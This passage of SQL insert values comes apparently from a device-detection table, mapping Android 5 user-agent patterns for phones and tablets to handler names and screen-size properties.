(Linux; Android 5.*; T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T702) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TCL_P561U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO 7C) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO 8H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO DP10A Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO DP7CPRO) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO DP8D) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tecno','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO N5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO N5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-C5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-C8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-J5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-J5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-J8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-L5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-L5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-L8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TECNO-L8Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TIT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TIT-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TITAN 5K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TITAN LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TM-5005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TM-8044) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TONE m15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TP601A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TP601C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TURKCELL T60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TZ18) AppleWebKit/* (KHTML, like Gecko) Chrome Yowser/2.0 Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Tab2A7-10F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tablets','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Tango) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Tasty) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Tele2_Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Texet TM-4083) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Titans2_DG700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Tmovi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Treat) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Trekker-M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Trekker-S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Turbo-X O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TurboPhone4G 05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; TurboPhone4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Turk Telekom TT175) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; U2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; U200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; U402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ULTRA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ULTRA) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; UNONU UM405 LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; USCC-E6762) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ultra Charm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ultra Style) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ultra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V2_Viper_I4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V2s+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V49) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; V5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VERGATARIO 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VERGATARIO5PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VF-1397) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VF-696) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VF-795) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VF-895N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VFD 100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VFD 200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VIVAX_Fly3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VIVO 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VIVO XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VK810 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VOX S502 3G VS5003MG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VOYAGER2_DG310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VS425PP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VS810PP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VS880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VS880PP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VS980 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Valencia2_Y100pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Venus X15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Venus_V3_5020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VerykoolS5017Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 